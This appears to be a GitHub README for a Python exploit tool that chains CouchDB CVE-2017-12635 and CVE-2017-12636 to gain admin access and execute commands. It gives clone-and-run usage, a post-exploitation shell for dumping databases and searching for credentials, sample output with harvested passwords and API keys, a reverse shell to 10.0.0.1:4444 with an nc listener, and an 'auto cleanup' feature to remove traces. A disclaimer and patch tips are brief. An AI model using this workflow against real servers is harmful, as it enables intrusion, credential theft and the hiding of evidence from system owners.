This tool exploits two critical vulnerabilities in Apache CouchDB:
| CVE | Description | Severity |
|---|---|---|
| CVE-2017-12635 | Privilege Escalation via JSON Parsing Bypass | π΄ Critical |
| CVE-2017-12636 | Remote Code Execution via Query Server | π΄ Critical |
- CVE-2017-12635: Exploits inconsistent JSON parsing between Erlang and JavaScript parsers to create an admin user
- CVE-2017-12636: Uses the admin access to configure a malicious Query Server and execute system commands
| Version | Vulnerable | Fixed Version |
|---|---|---|
| Apache CouchDB < 1.7.0 | β Yes | 1.7.0 |
| Apache CouchDB 1.x.x | β Yes | 1.7.0 |
| Apache CouchDB 2.0.0 | β Yes | 2.1.1 |
| Apache CouchDB 2.1.0 | β Yes | 2.1.1 |
| Apache CouchDB β₯ 2.1.1 | β No | - |
curl http://target:5984/
β¨ Features
β
Automatic Exploitation - One command to rule them all
β
Interactive Shell - User-friendly command interface
β
Database Viewer - Browse all databases and documents
β
Full JSON Display - See complete document content
β
Global Search - Search for keywords across all databases
β
System Commands - Execute arbitrary commands on the target
β
Reverse Shell - Get a full interactive shell
β
Command History - Keep track of your actions
β
Auto Cleanup - Remove traces after exploitation
β
Color Output - Easy to read and understand
π¦ Installation Prerequisites bash
python3 --version
Clone & Install bash
git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit
pip install -r requirements.txt
Requirements txt
requests>=2.25.0 urllib3>=1.26.0
π Usage Basic Usage bash
python3 couchdb-exploit.py -t <TARGET_IP> -p
python3 couchdb-exploit.py -t 192.168.1.100 -p 5984
Command Line Options bash
python3 couchdb-exploit.py -h
usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]
arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)
π» Commands
Once exploited, you'll have an interactive shell: Command Description Example db Show all databases with document counts db view View ALL documents in a database (full JSON) view passwords raw Show raw server response raw admin count Count documents in a database count users search Search for a keyword in ALL databases search admin exec Execute a system command exec whoami reverse Setup reverse shell reverse 10.0.0.1 4444 history Show command history history help Show this menu help exit Exit with cleanup exit π Examples
- List All Databases bash
couchdb> db
[+] 39 databases:
-
_replicator (0 docs)
-
_users (12 docs)
-
admin (5 docs)
-
passwords (25 docs)
-
core-configuration (8 docs) ...
-
View Database Content bash
couchdb> view passwords
[*] Total documents: 25
π Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "admin@example.com", "role": "superadmin" }
- Search for Credentials bash
couchdb> search password
β Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }
β Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }
- Execute System Commands bash
couchdb> exec whoami [+] Executing: whoami [+] Command executed!
couchdb> exec id [+] Executing: id [+] Command executed!
- Reverse Shell bash
nc -lvnp 4444
couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!
πΌοΈ Screenshots Exploit in Action
https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot Database View
https://via.placeholder.com/800x400?text=Database+View Reverse Shell
https://via.placeholder.com/800x400?text=Reverse+Shell
IMPORTANT: This tool is for educational and authorized testing purposes only.
π« Do NOT use on systems without explicit permission
π« The author is not responsible for any misuse
π« Use only in controlled environments or your own systems
β
Always get written authorization before testing
β
Follow responsible disclosure practices
By using this tool, you agree to these terms. π Security Tips
If you're a system administrator:
Upgrade immediately to CouchDB β₯ 1.7.0 or β₯ 2.1.1
Use firewall to restrict access to port 5984
Enable authentication and use strong passwords
Monitor logs for suspicious activity
Regular security audits of your infrastructure
Quick Fix bash
sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version
sudo ufw allow from 192.168.1.0/24 to any port 5984
π References
CVE-2017-12635 - NVD
CVE-2017-12636 - NVD
Apache CouchDB Security
Exploit-DB
π€ Author
darabium
GitHub: @darabium
Telegram: @darabium
β Support
If you find this useful:
β Star the repository
π Report issues
π§ Contribute improvements
π’ Share with others
π License
This project is licensed under the MIT License - see the LICENSE file for details.
Made with β€οΈ for security research
β¬ Back to Top